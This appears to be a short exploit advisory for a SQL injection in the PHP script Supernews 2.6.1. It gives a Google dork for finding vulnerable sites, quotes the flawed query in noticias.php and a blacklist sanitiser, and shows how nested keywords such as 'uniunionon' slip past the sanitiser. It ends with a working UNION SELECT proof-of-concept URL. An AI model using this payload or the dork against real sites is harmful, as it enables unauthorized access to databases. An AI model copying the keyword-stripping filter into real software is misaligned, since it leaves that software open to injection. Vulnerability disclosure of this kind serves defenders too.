## Supernews <= 2.6.1 (noticias.php cat) Remote SQL Injection
## Google Dork: intext:"2003 - 2004 : SuperNews : Todos os direitos reservados"
## Bug discovered by Pr0T3cT10n, <pr0t3ct10n@gmail.com>
## Date: 31/05/2012
## Version: 2.6.1
## Software Link: http://phpbrasil.com/script/vT0FaOCySSH/supernews
##          Author will be not responsible for any damage.
## Vulnerable Code - noticias.php [30-31]:
30.	$idcategoria = formatDados($_GET['cat']);
31.	$query = mysql_query("SELECT id, categoria FROM {$prefixdb}notcategorias WHERE id=$idcategoria ORDER BY categoria");

## NOTE:
## As you can see there is filter to variable $idcategoria.

## Function code - funcao.php [106-112]:
106.function formatDados($data) { 
107.	$data = strip_tags($data);
108.	$data = trim($data);
109.	$data = get_magic_quotes_gpc() == 0 ? addslashes($data) : $data;
110.	$data = preg_replace("@(--|\#|\*|;|select|union|drop|insert|delete|xp_|\=| or |-shutdown|update| and |&|')@s", "", $data);
111.	return $data;

## As you can see, this function can be bypassed easily by the following example:
# string 'uniunionon' will replace to clean 'union'
# string 'seleselectct' will replace to clean 'select'

## SQL Injection PoC:
## http://www.example.com/noticias.php?cat=-1+uniunionon+seleselectct+1,version()--
# Cya :)
# 0x31337.net
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Supernews <= 2.6.1 (noticias.php cat) SQL Injection
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